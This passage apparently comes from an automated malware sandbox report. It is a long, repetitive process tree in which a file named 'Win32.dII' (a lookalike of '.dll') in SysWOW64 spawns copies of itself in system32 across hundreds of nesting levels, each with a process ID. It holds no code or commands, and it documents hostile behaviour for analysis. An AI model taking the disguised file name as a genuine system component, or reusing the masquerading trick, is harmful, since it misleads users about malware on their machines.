        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        364⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        365⤵
        
        PID:568
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        366⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        367⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        368⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        369⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        370⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        371⤵
        
        PID:540
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        372⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        373⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        374⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        375⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        376⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        377⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        378⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        379⤵
        
        PID:628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        380⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        381⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        382⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        383⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        384⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        385⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        386⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        387⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        388⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        389⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        390⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        391⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        392⤵
        
        PID:908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        393⤵
        
        PID:576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        394⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        395⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        396⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        397⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        398⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        399⤵
        
        PID:280
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        400⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        401⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        402⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        403⤵
        
        PID:352
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        404⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        405⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        406⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        407⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        408⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        409⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        410⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        411⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        412⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        413⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        414⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        415⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        416⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        417⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        418⤵
        
        PID:444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        419⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        420⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        421⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        422⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        423⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        424⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        425⤵
        
        PID:696
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        426⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        427⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        428⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        429⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        430⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        431⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        432⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        433⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        434⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        435⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        436⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        437⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        438⤵
        
        PID:952
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        439⤵
        
        PID:996
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        440⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        441⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        442⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        443⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        444⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        445⤵
        
        PID:572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        446⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        447⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        448⤵
        
        PID:568
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        449⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        450⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        451⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        452⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        453⤵
        
        PID:184
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        454⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        455⤵
        
        PID:2992
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        456⤵
        
        PID:540
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        457⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        458⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        459⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        460⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        461⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        462⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        463⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        464⤵
        
        PID:628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        465⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        466⤵
        
        PID:1328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        467⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        468⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        469⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        470⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        471⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        472⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        473⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        474⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        475⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        476⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        477⤵
        
        PID:908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        478⤵
        
        PID:576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        479⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        480⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        481⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        482⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        483⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        484⤵
        
        PID:280
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        485⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        486⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        487⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        488⤵
        
        PID:352
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        489⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        490⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        491⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        492⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        493⤵
        
        PID:1664
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        494⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        495⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        496⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        497⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        498⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        499⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        500⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        501⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        502⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        503⤵
        
        PID:444
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        504⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        505⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        506⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        507⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        508⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        509⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        510⤵
        
        PID:696
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        511⤵
        
        PID:2820
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        512⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        513⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        514⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        515⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        516⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        517⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        518⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        519⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        520⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        521⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        522⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        523⤵
        
        PID:952
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        524⤵
        
        PID:996
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        525⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        526⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        527⤵
        
        PID:2520
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        528⤵
        
        PID:1096
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        529⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        530⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        531⤵
        
        PID:2644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        532⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        533⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        534⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        535⤵
        
        PID:1752
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        536⤵
        
        PID:1288
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        537⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        538⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        539⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        540⤵
        
        PID:2960
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        541⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        542⤵
        
        PID:704
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        543⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        544⤵
        
        PID:1588
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        545⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        546⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        547⤵
        
        PID:1700
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        548⤵
        
        PID:1044
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        549⤵
        
        PID:964
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        550⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        551⤵
        
        PID:596
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        552⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        553⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        554⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        555⤵
        
        PID:692
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        556⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        557⤵
        
        PID:776
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        558⤵
        
        PID:2908
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        559⤵
        
        PID:1100
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        560⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        561⤵
        
        PID:1816
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        562⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        563⤵
        
        PID:304
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        564⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        565⤵
        
        PID:3000
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        566⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        567⤵
        
        PID:980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        568⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        569⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        570⤵
        
        PID:560
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        571⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        572⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        573⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        574⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        575⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        576⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        577⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        578⤵
        
        PID:852
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        579⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        580⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        581⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        582⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        583⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        584⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        585⤵
        
        PID:768
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        586⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        587⤵
        
        PID:564
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        588⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        589⤵
        
        PID:316
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        590⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        591⤵
        
        PID:340
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        592⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        593⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        594⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        595⤵
        
        PID:896
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        596⤵
        
        PID:2176
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        597⤵
        
        PID:2964
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        598⤵
        
        PID:1780
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        599⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        600⤵
        
        PID:2524
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        601⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        602⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        603⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        604⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        605⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        606⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        607⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        608⤵
        
        PID:1156
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        609⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        610⤵
        
        PID:1640
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        611⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        612⤵
        
        PID:2600
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        613⤵
        
        PID:572
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        614⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        615⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        616⤵
        
        PID:568
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        617⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\Win32.dII
        
        C:\Windows\system32\Win32.dII
        618⤵
        
